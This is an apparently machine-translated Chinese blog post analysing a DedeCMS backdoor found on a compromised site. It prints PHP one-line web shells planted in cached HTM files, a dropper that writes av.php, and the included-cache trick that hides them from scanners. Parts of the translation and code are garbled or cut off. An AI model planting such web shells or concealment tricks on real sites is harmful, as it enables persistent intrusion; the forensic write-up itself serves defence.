隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件)

2021-08-23 0 1,338

该单位一个站点使用的 DEDECM 今天由一家黑色的 broad getshell 公司提交给 wooyun.com

为了恢复黑阔入侵的技术，Guige 的 getshell 测试没有成功。你有没有得到一次机会就不会再成功了？
但是，我只能打包代码。我只能用各种 webshell 扫描仪扫描 data/tplcache/xxxxx.inc 文件。文件代码如下：

{dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}

但是我在所有的 web 目录中都找不到 90sec.php 文件。一位朋友指出可能是其他文件，包括这个文件。然后我使用 Seay 的代码审计工具定义了各种关键字，但仍然找不到它们。
最后，老板转到 data/cache 目录，找到几个 HTM 文件，myad-1.HTM、myad-16.HTM、mytag-1208.HTM 等。用以下代码打开这些 HTML 文件：

document.write(“dedecmsisok<?php@eval($_POST[cmd]);?>”);

Select Code

Copy

document.write(“axxxxx’);echo‘OK’;@fclose($fp);?>”);

Select Code

Copy

document.write(“<?php$fp =@fopen(‘av.php’, ‘a’);@fwrite($fp,‘<?php eval($_POST[110])?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

Select Code

Copy

document.write(“<?phpecho ‘dedecms 5.70day<br>guige,90sec.org’;@preg_replace(‘/[copyright]/e’,


看到这些文件真奇怪。我不知道黑阔想要什么？？虽然代码看起来很熟悉，但 HTML 文件可以用作后门吗？想想我的朋友说的 include，然后结合前一段时间 getshell 漏洞攻击的细节，最后转到 plus/mytag_Js.php 文件。在这个文件中，我终于找到了一个黑色、宽阔、肆无忌惮的地方。主要代码如下：
看到上面的代码，我们应该知道黑阔有多邪恶。在生成的 HTM 格式缓存文件中编写各种类型的一句代码，然后修改 plus/ad_Js.php 和 mytag_Js.php 文件，包括 HTM 格式的缓存文件。这样，黑阔只需在菜刀中填写以下 URL 即可连接一句话
http://www.xxx.com/plus/mytag_ js.php？id=1208
http://www.xxx.com/plus/ad_ js.php？id=1
特定 ID 和文件名与 data/cache 目录中的 myad-1.htm 和 mytag-1208.htm 相关。因此，各种 web shell 扫描仪不会扫描 web shell 后门文件，因为许多默认情况下不会扫描 HTM